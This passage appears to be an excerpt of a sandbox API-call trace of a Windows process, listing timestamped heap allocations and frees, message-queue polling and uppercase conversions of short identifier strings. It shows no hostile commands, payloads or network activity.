Flags=0x0, Size=0xc) returned 0x2aab518 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab698 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0212.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0212.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0212.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0212.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0212.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0212.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0212.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0212.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0212.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0212.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0212.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0212.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0212.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5d8 | out: hHeap=0x2af0000) returned 1 [0212.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab680 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab518 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38542c0 | out: hHeap=0x2af0000) returned 1 [0212.487] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854278 | out: hHeap=0x2af0000) returned 1 [0212.487] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.487] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0212.487] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0212.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0212.488] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0212.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab290 [0212.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854e90 [0212.488] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0212.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0212.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0212.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0212.488] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0212.488] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0212.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.488] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0212.489] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0212.489] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0212.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0212.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0212.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0212.489] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.489] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854e90 | out: hHeap=0x2af0000) returned 1 [0212.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0212.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0212.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0212.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0212.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0212.490] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0212.490] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.490] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.491] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0212.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0212.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0212.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0212.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0212.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0212.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0212.492] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0212.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0212.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865268 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0212.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0212.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0212.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0212.496] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0212.496] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0212.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab410 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0212.496] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0212.496] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0212.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0212.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.496] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0212.496] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0212.497] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0212.497] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0212.497] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0212.497] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0212.497] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 